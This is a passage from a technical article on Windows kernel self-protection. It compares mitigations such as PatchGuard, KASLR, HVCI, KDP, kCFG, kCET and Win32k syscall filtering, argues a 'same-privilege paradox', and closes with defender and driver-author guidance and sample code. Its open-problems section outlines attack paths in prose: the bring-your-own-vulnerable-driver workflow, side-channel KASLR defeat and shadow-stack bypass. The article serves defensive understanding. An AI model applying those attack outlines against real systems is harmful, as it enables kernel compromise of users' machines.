&lt;td&gt;Caller-defined per-syscall filter for any process&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Win32kSystemCallFilter&lt;/code&gt; (system-defined IDs)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;eBPF kernel-mode restrictions&lt;/td&gt;
&lt;td&gt;Mainline since 5.8 (2020)&lt;/td&gt;
&lt;td&gt;Limits unprivileged users from loading eBPF programs that touch kernel state&lt;/td&gt;
&lt;td&gt;No direct Windows analogue&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The shared design move across all six is &lt;strong&gt;structural privilege reduction rather than same-privilege integrity monitoring&lt;/strong&gt;. seccomp-bpf is particularly instructive as a counterpoint to &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt;. The Linux design is &lt;em&gt;caller-defined&lt;/em&gt;: any process can register a BPF program that filters its own syscalls. The Windows design is &lt;em&gt;system-defined&lt;/em&gt;: a process registers an opaque bitmap of &lt;code&gt;FilterId&lt;/code&gt; values whose semantics are decided by the kernel. The two are not interchangeable, but they answer the same architectural question -- &quot;how do you let a process tell the kernel which syscalls it does not want?&quot; -- with the same fundamental move: per-process surface deletion at the syscall boundary.&lt;/p&gt;
&lt;h3&gt;Hypervisor-anchored alternatives at the application level&lt;/h3&gt;
&lt;p&gt;The third philosophy applies the &quot;live at a different privilege than the attacker&quot; answer at the &lt;em&gt;application&lt;/em&gt; level rather than the kernel level. Bromium / HP Sure Click and Windows Defender Application Guard open every tab or document in its own micro-VM. The hypervisor is the protection boundary; the kernel inside the VM may be fully compromised without affecting the host. This is structurally the same move Microsoft makes with VBS / VTL1, applied one level up the stack.&lt;/p&gt;
&lt;h3&gt;Three philosophies, one shared admission&lt;/h3&gt;
&lt;p&gt;Three platforms, three philosophies, one shared admission: every architecture eventually had to admit that a defense at the same privilege as the attacker cannot succeed in principle. Apple put the defense in silicon. Linux invested in surface reduction instead of integrity monitoring. Microsoft built a same-privilege deterrent first, then migrated the load-bearing pieces of it to VTL1. The interesting disagreement is not whether the paradox exists -- it is where, exactly, to put the defense instead. That is a question with no single right answer, and to see why, we have to state the paradox formally.&lt;/p&gt;
&lt;h2&gt;8. The same-privilege paradox, formally&lt;/h2&gt;
&lt;p&gt;Now we can state the paradox in a sentence: &lt;em&gt;a defense that shares its CPU privilege level with the attacker can in principle always be subverted by an attacker at that privilege level, because every code path and data structure the defense relies on is, by construction, mutable by the attacker.&lt;/em&gt; It is not a formal impossibility theorem in the cryptographic sense -- there is no FLP-style no-go proof for kernel self-defense -- but it is the de facto design constraint Microsoft has acknowledged in writing.&lt;/p&gt;
&lt;h3&gt;Microsoft&apos;s formal admission&lt;/h3&gt;
&lt;p&gt;The Microsoft Security Servicing Criteria for Windows defines a &quot;security boundary&quot; as &lt;em&gt;&quot;a logical separation between the code and data of security domains with different levels of trust&quot;&lt;/em&gt;, with kernel-mode versus user-mode as the canonical example [@ms-servicing-criteria]. The document then enumerates which transitions Microsoft treats as security boundaries (kernel / user, hypervisor / kernel, VTL1 / VTL0, virtual machine / host, network), and explicitly &lt;em&gt;does not&lt;/em&gt; enumerate admin-to-kernel or kernel-to-kernel as boundaries. The exclusion is the cleanest possible architectural admission of the paradox: no defense at CPL=0 in the attacker&apos;s kernel can be a security boundary, no matter how cleverly engineered. PatchGuard, by Microsoft&apos;s own classification, is not a boundary and never has been.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The same-privilege paradox is, formally, the observation that the &lt;strong&gt;reference monitor&lt;/strong&gt; of a security policy must be tamper-resistant from the principals it monitors, and that &quot;tamper-resistant from a co-resident kernel-mode attacker&quot; is structurally unachievable in a single-address-space single-privilege design. Every modern Windows kernel mitigation either &lt;em&gt;raises the cost&lt;/em&gt; of tampering (the engineering-deterrent class: PatchGuard, KASLR, kASLR variants) or &lt;em&gt;moves the monitor outside CPL=0&lt;/em&gt; (the structural class: KDP, kCFG-with-VBS-bitmap, kCET, the entire VTL1-anchored stack). Only the second class can claim a security boundary.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The KASLR-specific bound&lt;/h3&gt;
&lt;p&gt;The cleanest mathematical version of the paradox lives in the KASLR side-channel literature. Suppose an x64 system has $n$ bits of entropy in its kernel base address; the probabilistic floor on guessing it from one shot is $2^{-n}$. The Hund-Willems-Holz 2013 result is that a co-resident user-mode attacker with access to a shared TLB or cache state can extract bits of the kernel base at a rate of one bit per probe, recovering the address in $O(n)$ probes -- a polynomial-time defeat of the probabilistic defense [@doi-hund-2013]. Increasing $n$ does not change the asymptotic; it only changes the constant. Gruss et al. 2017 generalised the argument across micro-architectural side channels and concluded that any operating system implementing user / kernel address-space sharing on a CPU with shared TLB / cache state must leak the kernel base address to an unprivileged user-mode timing observer [@gruss-kaiser-pdf]. The structural fix is not to add entropy: it is to remove the sharing. KVA Shadow / KPTI is the structural answer.&lt;/p&gt;
&lt;p&gt;The shape of the bound is general. Wherever a defense&apos;s correctness reduces to &lt;em&gt;the attacker not knowing X&lt;/em&gt;, and &lt;em&gt;X&lt;/em&gt; leaks across a shared micro-architectural channel, the defense is asymptotically defeated.&lt;/p&gt;
&lt;h3&gt;The proper formal anchor: Anderson 1972&lt;/h3&gt;
&lt;p&gt;The right formal anchor for the same-privilege paradox is the reference-monitor concept introduced in Anderson&apos;s 1972 &lt;em&gt;Computer Security Technology Planning Study&lt;/em&gt; for the US Air Force [@csrc-anderson-1972]. Anderson&apos;s &quot;reference monitor&quot; must satisfy three properties:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Always invoked.&lt;/strong&gt; Every reference of a subject to an object is mediated.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tamper-resistant.&lt;/strong&gt; The reference monitor cannot be modified by the subjects it monitors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Small enough to be analysed.&lt;/strong&gt; The Trusted Computing Base (TCB) is small enough to be verified.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;PatchGuard fails property 2 by construction: it lives in the same address space as the subjects it monitors, and any subject with kernel-mode write can modify the verifier code, the verifier schedule, the expected-hash store, or the bug-check primitive. KDP, by contrast, satisfies property 2 because its enforcement lives in VTL1 and a VTL0 subject cannot reach VTL1.&lt;/p&gt;

A recurring confusion in the kernel-security literature is to anchor same-privilege-paradox arguments in the Bell-LaPadula or Biba multi-level security models (1973 / 1977). Those models formalise *information flow* across security domains -- which subjects may read or write which objects given their lattice levels. They are silent on the question of whether the policy *enforcement mechanism itself* can be tamper-resistant against a co-resident attacker. That is Anderson&apos;s reference-monitor property, formalised in the 1972 USAF report [@csrc-anderson-1972]. Bell-LaPadula assumes a tamper-resistant reference monitor as a precondition; Anderson&apos;s report is the document that *names* the precondition. For the same-privilege paradox, Anderson is the load-bearing anchor.
&lt;p&gt;The existence proof for what a minimal verifiable TCB looks like is seL4 (Klein et al., SOSP 2009): a roughly 8,700-line microkernel formally verified down to its C implementation against a high-level specification of access control. seL4 is the constructive counterpoint to the Microsoft-style mitigation stack: instead of adding integrity monitors to a large kernel, build a small kernel small enough to verify and put everything else in user-space servers. Windows&apos; VBS / VTL1 architecture is a partial gesture in the same direction -- the Secure Kernel is far smaller than the NT kernel and hosts only policy-enforcement trustlets -- but it is not a from-scratch redesign.&lt;/p&gt;
&lt;h3&gt;Upper and lower bounds, mitigation by mitigation&lt;/h3&gt;
&lt;p&gt;The 21-year story now lays out cleanly as a table of bounds.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Mitigation&lt;/th&gt;
&lt;th&gt;Upper bound achieved&lt;/th&gt;
&lt;th&gt;Lower bound that remains&lt;/th&gt;
&lt;th&gt;Structural reason&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;PatchGuard&lt;/td&gt;
&lt;td&gt;Engineering-deterrent class; raises cost of casual kernel hooking&lt;/td&gt;
&lt;td&gt;Zero structural lower bound; same-privilege bypass class always exists [@uninformed-v3-archive] [@cyberark-ghosthook]&lt;/td&gt;
&lt;td&gt;Verifier lives at attacker&apos;s privilege&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KASLR (entropy alone)&lt;/td&gt;
&lt;td&gt;Probabilistic floor against blind-guess attacker&lt;/td&gt;
&lt;td&gt;Zero structural lower bound against side-channel attacker [@doi-hund-2013]&lt;/td&gt;
&lt;td&gt;TLB / cache shared between user and kernel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KVA Shadow / KPTI&lt;/td&gt;
&lt;td&gt;Structural Meltdown fix (Variant 3)&lt;/td&gt;
&lt;td&gt;Spectre Variants 1, 2, 4 require separate mitigations [@usenix-lipp-meltdown]&lt;/td&gt;
&lt;td&gt;Address-space split addresses only the user-to-kernel transient read&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HVCI&lt;/td&gt;
&lt;td&gt;Structural W^X for kernel pages, enforced by VTL1&lt;/td&gt;
&lt;td&gt;VBS-coverage gap on systems that cannot run VBS [@ms-kdp-blog]&lt;/td&gt;
&lt;td&gt;Hypervisor is the protection boundary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KDP (static and dynamic)&lt;/td&gt;
&lt;td&gt;Structural read-only-after-init for explicitly-tagged kernel data&lt;/td&gt;
&lt;td&gt;Protects only what is explicitly opted in [@ms-kdp-blog]&lt;/td&gt;
&lt;td&gt;VTL1 enforces SLAT page tables outside VTL0 reach&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;kCFG (with HVCI)&lt;/td&gt;
&lt;td&gt;Structural forward-edge CFI; bitmap in VTL1-protected memory&lt;/td&gt;
&lt;td&gt;Backward edge unprotected; same-call-target overwrite via type confusion possible without XFG [@ms-cfg]&lt;/td&gt;
&lt;td&gt;Bitmap stored outside VTL0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;kCET&lt;/td&gt;
&lt;td&gt;Structural backward-edge CFI in CPU hardware&lt;/td&gt;
&lt;td&gt;Off-by-default on Server 2025; gated on driver &lt;code&gt;/CETCOMPAT&lt;/code&gt; [@ms-kernel-mode-hsp] [@mcgarr-bh25-blackhat]&lt;/td&gt;
&lt;td&gt;Shadow stack hardware enforced in silicon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Win32kSystemCallFilter&lt;/td&gt;
&lt;td&gt;Structural surface deletion for sandboxed renderers&lt;/td&gt;
&lt;td&gt;Full lockdown not viable for UI-bearing processes [@ms-syscall-filter-policy]&lt;/td&gt;
&lt;td&gt;Per-process bitmap consulted by syscall dispatcher&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The gap between the same-privilege upper bound (PatchGuard, KASLR-alone -- structurally zero) and the cross-privilege upper bound (HVCI, KDP, kCET -- structurally meaningful) is exactly the gap Microsoft has spent twenty-one years migrating across. With the paradox stated formally, the rest of the article is a single question: where in the privilege hierarchy does the next problem live, and how is Microsoft positioned to answer it?&lt;/p&gt;
&lt;h2&gt;9. Open problems on the June 2026 frontier&lt;/h2&gt;
&lt;p&gt;The same-privilege paradox is in 2026 closer to architecturally resolved than at any prior point in Windows history -- the VTL1-anchored stack of HVCI / KDP / kCFG / kCET makes the cross-privilege answer real. But every structural mitigation has a practical residual, and five of them are large enough to be the article&apos;s frontier.&lt;/p&gt;
&lt;h3&gt;BYOVD: the dominant 2026 attacker path&lt;/h3&gt;
&lt;p&gt;Bring-Your-Own-Vulnerable-Driver is the dominant practical defeat of every structural mitigation in the 2026 stack. Uroburos&apos;s 2011 pattern is essentially what current attackers do: locate a signed third-party driver with a kernel-write primitive (an IOCTL that allows arbitrary physical memory read or write, or arbitrary MSR manipulation), install it through a legitimate driver-load path, exploit the primitive to obtain arbitrary kernel write, then flip the policy flags or hook the structures Microsoft thought were protected. Elastic Security Labs&apos; 2024 survey of in-the-wild Windows kernel LPE 0-days confirms that BYOVD remains a recurring subsystem of incidents [@elastic-lpe-survey], and the Project Zero &quot;0day In the Wild&quot; tracker continues to record Windows kernel-mode CVEs across DWM, win32k, and ALPC subsystems [@pz-0days-tracker]. Every structural mitigation collapses the moment an attacker reaches arbitrary kernel write through a legitimately-loaded driver: KDP-protected pages can be ignored if the attacker can install a new driver that simply does not allocate from the secure pool; kCFG can be bypassed by writing to memory that was not opted in; kCET can be bypassed via McGarr-style &lt;code&gt;iretq&lt;/code&gt; corruption [@mcgarr-km-shadow]; PatchGuard can be hooked from a coexisting driver.&lt;/p&gt;
&lt;p&gt;The Microsoft Recommended Driver Block List [@ms-driver-block-rules] is the reactive answer. The structural problem -- that signed third-party drivers with kernel-write primitives exist &lt;em&gt;at all&lt;/em&gt;, and that the third-party driver supply chain cannot be removed for compatibility reasons -- is unresolved.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A defender architecting around the 2026 Windows kernel mitigation stack must assume BYOVD as the dominant practical bypass. The structural mitigations -- KDP, kCFG, kCET, HVCI -- are sound against an attacker who is &lt;em&gt;constrained&lt;/em&gt; to operate within the inbox kernel. They are not sound against an attacker who can load any of the recurring vulnerable signed drivers the Microsoft Recommended Driver Block List exists to catalogue [@ms-driver-block-rules] [@elastic-lpe-survey]. Verify that the block list is enforced (&lt;code&gt;CiTool --list-policies&lt;/code&gt;), watch CodeIntegrity Event ID 3099, and treat BYOVD as the threat model that drives mitigation selection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The VBS coverage gap&lt;/h3&gt;
&lt;p&gt;Every VTL1-anchored mitigation collapses on systems that cannot run VBS. Older silicon (pre-2015 Intel without VT-x / VT-d / EPT, AMD parts predating AMD-V / NPT), enterprise-imaged corporate fleets that disabled VBS for compatibility, ARM64 devices below a baseline, and any system without UEFI Secure Boot all fall back to the same-privilege defenses we just classified as structurally bounded. The defender&apos;s threat model is the worst case in the fleet, not the average case in the Microsoft launch announcement.&lt;/p&gt;
&lt;h3&gt;Win32k Lockdown coverage in UI-bearing processes&lt;/h3&gt;
&lt;p&gt;Office, browsers&apos; GPU and UI processes, and any application that draws windows cannot use the full &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt; lockdown. Their allow-lists must cover composition, font rendering, and a substantial fraction of the GDI surface -- which is exactly the surface from which historical LPE bugs emerged. The 2016 &lt;code&gt;win32kbase.sys&lt;/code&gt; / &lt;code&gt;win32kfull.sys&lt;/code&gt; typeisolation refactor (Windows 10 v1607, build 14393) split &lt;code&gt;win32k.sys&lt;/code&gt; to make the surface more attributable, but per-app auto-tuning of the allow-list from observed-call traces remains an open product-engineering problem [@j00ru-syscalls-table]. Until UI-bearing processes can use a tight allow-list rather than a permissive one, the win32k surface remains the systemic LPE foothold Bochspwn identified in 2013 [@j00ru-bochspwn-blog].&lt;/p&gt;
&lt;h3&gt;Hypervisor escapes as the structural counter&lt;/h3&gt;
&lt;p&gt;Every VTL1-anchored mitigation assumes VTL1 is uncompromised. Hyper-V CVEs show that the hypervisor TCB hosts its own vulnerability surface. CVE-2024-38080 (Hyper-V SLAT vulnerability) is a 2024 example with Akamai write-up [@akamai-hyperv-cve]. Joanna Rutkowska&apos;s 2006 Blue Pill demonstration at Black Hat USA, &lt;em&gt;Subverting Vista Kernel for Fun and Profit&lt;/em&gt;, was the seminal academic primary for the hypervisor-rootkit class and remains the canonical &quot;Hyperjacking&quot; reference [@blackhat-rutkowska-bluepill]. Every step the Windows mitigation stack takes toward putting more enforcement in VTL1 raises the criticality of VTL1&apos;s own correctness. The Hyper-V code base is small relative to &lt;code&gt;ntoskrnl&lt;/code&gt; but is not zero, and the post-2018 trend of finding side-channel and architectural bugs in CPU hardware applies to VTL1 as much as it does to VTL0.&lt;/p&gt;
&lt;h3&gt;kCET deployment completion&lt;/h3&gt;
&lt;p&gt;kCET is shipping but off-by-default on Windows Server 2025, gated on driver &lt;code&gt;/CETCOMPAT&lt;/code&gt; compatibility [@ms-kernel-mode-hsp]. Until kCET is on-by-default across the inbox kernel and all loaded drivers, the backward-edge ROP class against the Windows kernel remains exploitable in practice. McGarr&apos;s 2025 Black Hat USA deck documents both the structural-bypass frontier and the operational gating problem [@mcgarr-bh25-blackhat] [@mcgarr-github] [@mcgarr-km-shadow].&lt;/p&gt;

On July 19, 2024, a faulty kernel-mode signature update from CrowdStrike Falcon triggered a Windows page fault in a CrowdStrike driver, crashing an estimated 8.5 million Windows endpoints worldwide and disrupting airline operations, hospital systems, payment processing, and emergency-services dispatch for hours to days. The post-incident discussion produced one architectural takeaway widely shared across the kernel-security community: a single signed third-party kernel driver, even one shipped by a defender, can take the operating system down -- and there is no in-kernel protection against it that does not also break legitimate EDR vendors. Microsoft&apos;s 2006 position that the right answer is &quot;as few third-party kernel drivers as possible, with as much functionality as possible mediated by user-mode brokers&quot; got eighteen years of pushback before being retroactively vindicated. The 2024-2026 product direction -- Microsoft&apos;s announcement of the Windows Endpoint Security Platform, a user-mode EDR API that lets vendors build without kernel drivers -- is the inheritor of that position.
&lt;h3&gt;Historical anchoring: the win32k LPE share&lt;/h3&gt;
&lt;p&gt;The &quot;win32k killed half of LPE&quot; framing in the article&apos;s subtitle deserves time-scoping. Pre-lockdown, win32k was the dominant Windows kernel LPE subsystem -- Stuxnet 2010 (CVE-2010-2743) is the historical anchor [@nvd-cve-2010-2743], Bochspwn 2013 documented the systemic shape [@j00ru-bochspwn-blog] [@j00ru-bhusa-pdf], Forshaw 2016 reports that the Chrome M54 lockdown &quot;blocked the sandbox escape of an exploit chain being used in the wild&quot; [@pz-breaking-chain], and Elastic Security Labs&apos; 2024 in-the-wild survey continues to name win32k among the recurring subsystems [@elastic-lpe-survey]. The Project Zero 0day tracker also confirms that win32k remains in the post-lockdown attacker mix [@pz-0days-tracker]. The lockdown removed roughly half the historically-vulnerable syscall surface &lt;em&gt;from sandboxed renderers specifically&lt;/em&gt;; both the fraction and the scope are time- and context-bounded, and a precise percentage cannot be cited to the Project Zero tracker because the tracker does not publish per-subsystem aggregates.&lt;/p&gt;

flowchart TD
    subgraph SD[&quot;Surface deletion (kernel system-call boundary)&quot;]
        SDF[&quot;Win32kSystemCallFilter per-process bitmap&quot;]
        SDD[&quot;DisallowWin32kSystemCalls all-or-nothing&quot;]
    end
    subgraph V1[&quot;VTL1 (Secure Kernel anchored)&quot;]
        V1H[&quot;HVCI (W^X SLAT for kernel pages)&quot;]
        V1K[&quot;KDP static and dynamic via SLAT RO&quot;]
        V1C[&quot;kCFG bitmap in VTL1-protected memory&quot;]
    end
    subgraph CPU[&quot;CPU mediated (hardware enforced)&quot;]
        CPUS[&quot;kCET shadow stack on Intel CET / AMD&quot;]
        CPUK[&quot;KVA Shadow CR3 switch&quot;]
    end
    subgraph V0[&quot;VTL0 same-privilege (CPL=0)&quot;]
        V0P[&quot;PatchGuard integrity checks&quot;]
        V0K[&quot;KASLR base-address randomisation&quot;]
    end
    SD --&amp;gt; V1
    V1 --&amp;gt; CPU
    CPU --&amp;gt; V0
&lt;p&gt;BYOVD is in 2026 what same-privilege bypass was in 2007 -- the dominant practical defeat of a mitigation stack whose individual pieces are each structurally sound. The next twenty-one years of Windows kernel self-defense will be substantially the story of what Microsoft does about it.&lt;/p&gt;
&lt;h2&gt;10. What a Windows defender or driver developer actually does today&lt;/h2&gt;
&lt;p&gt;The article&apos;s intellectual payoff has been made; the practical payoff is the rest of this section. Five concrete decision questions, in roughly the order a working practitioner would reason through them.&lt;/p&gt;
&lt;h3&gt;1. Is the system Secured-core or Windows 11 22H2+ with Memory Integrity on?&lt;/h3&gt;
&lt;p&gt;If yes, HVCI, KDP, kCFG, and the Microsoft Recommended Driver Block Rules are baseline [@ms-kdp-blog] [@ms-driver-block-rules]. Layer kCET if all loaded drivers are &lt;code&gt;/CETCOMPAT&lt;/code&gt; and the CPU is Intel 11th-gen Tiger Lake or later or AMD Zen 3 or later [@ms-kernel-mode-hsp]. The baseline gets you the structural mitigations the same-privilege paradox argues are required; everything else is layered on top.&lt;/p&gt;
&lt;h3&gt;2. Is the workload a sandboxed renderer or sandboxable child process?&lt;/h3&gt;
&lt;p&gt;Apply &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt; (Windows 10 1709+) via &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, ...)&lt;/code&gt; at &lt;code&gt;CreateProcess&lt;/code&gt; time, not at runtime [@ms-syscall-filter-policy]. The Forshaw / Fratric race-the-mitigation Edge demonstration is the empirical reason -- if the filter is applied after the child process has started, an attacker who races the policy application can simply not be filtered [@pz-breaking-chain]. The Chromium sandbox is the canonical consumer reference for what this composition looks like in a production browser [@chromium-sandbox-doc].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every per-process mitigation in modern Windows -- &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt;, &lt;code&gt;DisallowWin32kSystemCalls&lt;/code&gt;, ACG, CIG, Strict CIG, user-mode shadow stack, CFG -- belongs on the &lt;code&gt;CreateProcess&lt;/code&gt; boundary. The Forshaw / Fratric Project Zero finding on Edge&apos;s window-broker race [@pz-breaking-chain] is the empirical proof that mitigations applied to a running process leave a race window. The Windows API path is &lt;code&gt;STARTUPINFOEXW&lt;/code&gt; with a &lt;code&gt;PPROC_THREAD_ATTRIBUTE_LIST&lt;/code&gt; containing &lt;code&gt;PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY&lt;/code&gt;; the policy enums to set are documented in &lt;code&gt;ntddk.h&lt;/code&gt; for the filter [@ms-syscall-filter-policy] and in &lt;code&gt;winnt.h&lt;/code&gt; for the disable [@ms-syscall-disable-policy].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;3. Is the workload UI-bearing?&lt;/h3&gt;
&lt;p&gt;Full lockdown is out of reach for processes that draw windows, render fonts, or dispatch input. The practical answer is the &lt;em&gt;adjacent&lt;/em&gt; mitigation set: Arbitrary Code Guard (ACG), Code Integrity Guard (CIG), Strict CIG, user-mode shadow stack, and CFG, plus PatchGuard, HVCI, and kCFG at the system level. The composition raises the cost of remote exploitation without requiring the renderer-style syscall-surface deletion.&lt;/p&gt;

For a sandboxed renderer-class process on Windows 11 22H2+:&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;Win32kSystemCallFilter&lt;/code&gt;&lt;/strong&gt; -- &lt;code&gt;PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY&lt;/code&gt; with the bitmap permitting only the &lt;code&gt;FilterId&lt;/code&gt; values the renderer needs [@ms-syscall-filter-policy].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ACG (Arbitrary Code Guard)&lt;/strong&gt; -- forbid dynamic code generation in the process.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CIG / Strict CIG (Code Integrity Guard)&lt;/strong&gt; -- forbid loading non-Microsoft-signed DLLs (CIG), or non-Microsoft-signed-and-not-store-signed DLLs (Strict CIG).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;User-mode shadow stack and CFG&lt;/strong&gt; -- backward and forward edge CFI in user mode.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;All four are applied via &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, ...)&lt;/code&gt; at &lt;code&gt;CreateProcess&lt;/code&gt; time, in the same call. The Chromium renderer is the canonical reference deployment [@chromium-sandbox-doc].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;4. Are you a driver author?&lt;/h3&gt;
&lt;p&gt;Three things to do, in order:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Mark RO-after-init data via Static KDP.&lt;/strong&gt; Call &lt;code&gt;MmProtectDriverSection&lt;/code&gt; from &lt;code&gt;DriverEntry&lt;/code&gt; on any image section that should be read-only for the rest of the driver&apos;s lifetime [@ms-kdp-blog].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Allocate runtime-protected state via Dynamic KDP.&lt;/strong&gt; Call &lt;code&gt;ExAllocatePool3&lt;/code&gt; with a &lt;code&gt;POOL_EXTENDED_PARAMETER&lt;/code&gt; array containing a &lt;code&gt;POOL_EXTENDED_PARAMS_SECURE_POOL&lt;/code&gt; extended parameter. Set &lt;code&gt;SECURE_POOL_FLAGS_FREEABLE&lt;/code&gt; if the allocation needs to be freeable; set &lt;code&gt;SECURE_POOL_FLAG_MODIFIABLE&lt;/code&gt; only if the allocation must be modifiable under further protected control [@ms-kdp-blog].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Compile with &lt;code&gt;/guard:cf&lt;/code&gt; and &lt;code&gt;/CETCOMPAT&lt;/code&gt;.&lt;/strong&gt; The first enables CFG instrumentation across the driver image; the second tells the loader the driver is compatible with kernel-mode shadow stack [@ms-cfg] [@ms-kernel-mode-hsp].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The driver-side KDP pattern is short enough to show in full:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;// DriverEntry-time static KDP: mark a .rdata-like section as read-only
NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject,
                     _In_ PUNICODE_STRING RegistryPath) {
    NTSTATUS status = MmProtectDriverSection(
        &amp;amp;g_PolicyTable,        // address of the section to protect
        sizeof(g_PolicyTable), // size in bytes
        0);                    // reserved
    if (!NT_SUCCESS(status)) return status;
    // ... rest of driver init
    return STATUS_SUCCESS;
}

// Runtime dynamic KDP allocation: a secure pool buffer
POOL_EXTENDED_PARAMETER params[2] = {0};
params[0].Type = PoolExtendedParameterSecurePool;
params[0].SecurePoolParams = &amp;amp;(POOL_EXTENDED_PARAMS_SECURE_POOL){
    .SecurePoolFlags = SECURE_POOL_FLAGS_FREEABLE,
    .SecurePoolBuffer = NULL,
    .Cookie = 0xC0FFEEDEADBEEFULL,
    .NoFill = FALSE,
};
params[1].Type = PoolExtendedParameterInvalidType;

PVOID secureBuffer = ExAllocatePool3(
    POOL_FLAG_NON_PAGED,    // pool flags
    bufferSize,             // size
    &apos;KDPx&apos;,                 // pool tag
    params,                 // extended parameters
    1);                     // count of extended parameters
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;5. Are you a defender on an existing fleet?&lt;/h3&gt;
&lt;p&gt;Verify that the Recommended Driver Block Rules are active via &lt;code&gt;CiTool --list-policies&lt;/code&gt;. Look for a policy whose &lt;code&gt;Friendly Name&lt;/code&gt; is &lt;code&gt;Microsoft Windows Driver Policy&lt;/code&gt; and &lt;code&gt;Is Currently Enforced&lt;/code&gt; is &lt;code&gt;true&lt;/code&gt; [@ms-driver-block-rules]. Watch Event ID 3099 in the CodeIntegrity Operational log for block events. For verifying the broader VBS / HVCI state, the canonical PowerShell query is &lt;code&gt;Get-CimInstance Win32_DeviceGuard&lt;/code&gt; followed by selecting &lt;code&gt;VirtualizationBasedSecurityStatus&lt;/code&gt;, &lt;code&gt;SecurityServicesRunning&lt;/code&gt;, and &lt;code&gt;AvailableSecurityProperties&lt;/code&gt;. For KVA Shadow specifically, &lt;code&gt;Get-SpeculationControlSettings&lt;/code&gt; reports the state. For per-process mitigation policy, &lt;code&gt;Get-ProcessMitigation -System&lt;/code&gt; for the system policy and &lt;code&gt;Get-ProcessMitigation -Name &amp;lt;name&amp;gt;&lt;/code&gt; for a specific process; the Chromium internal page &lt;code&gt;chrome://sandbox&lt;/code&gt; shows the per-process filter state from inside the browser.&lt;/p&gt;
&lt;p&gt;A reader who wants to play with the field-decoding logic can do it in a browser. The Python below mirrors what the PowerShell pipeline does -- enumerate the bits, decode by name. The real Windows API surface is bigger, but the decoding shape is the same.&lt;/p&gt;
&lt;p&gt;{`&lt;/p&gt;
Conceptual decoder for Win32_DeviceGuard fields
Real PowerShell: Get-CimInstance Win32_DeviceGuard | Select VirtualizationBasedSecurityStatus,
SecurityServicesRunning, AvailableSecurityProperties
&lt;p&gt;VBS_STATUS = {
    0: &quot;VBS not enabled&quot;,
    1: &quot;VBS enabled but not running&quot;,
    2: &quot;VBS enabled and running&quot;,
}&lt;/p&gt;
&lt;p&gt;SECURITY_SERVICES = {
    0: &quot;None&quot;,
    1: &quot;Credential Guard&quot;,
    2: &quot;HVCI&quot;,
    3: &quot;System Guard Secure Launch&quot;,
    4: &quot;SMM Firmware Measurement&quot;,
    7: &quot;Kernel Mode Hardware-enforced Stack Protection (kCET)&quot;,
    8: &quot;Hypervisor-Protected Code Integrity (HVCI legacy)&quot;,
}&lt;/p&gt;
&lt;p&gt;AVAILABLE_PROPERTIES = {
    1: &quot;Base virtualization support&quot;,
    2: &quot;Secure boot&quot;,
    3: &quot;DMA protection&quot;,
    4: &quot;Secure memory overwrite&quot;,
    5: &quot;UEFI code readonly&quot;,
    6: &quot;SMM security mitigations&quot;,
    7: &quot;Mode-based execute control for HVCI&quot;,
    8: &quot;APIC virtualization&quot;,
}&lt;/p&gt;
&lt;p&gt;def decode(field_name, value, table):
    if isinstance(value, list):
        names = [table.get(v, f&quot;unknown({v})&quot;) for v in value]
        print(f&quot;  {field_name}: {names}&quot;)
    else:
        print(f&quot;  {field_name}: {table.get(value, f&apos;unknown({value})&apos;)}&quot;)&lt;/p&gt;
Simulated CIM response from a Secured-core PC
&lt;p&gt;sample = {
    &quot;VirtualizationBasedSecurityStatus&quot;: 2,
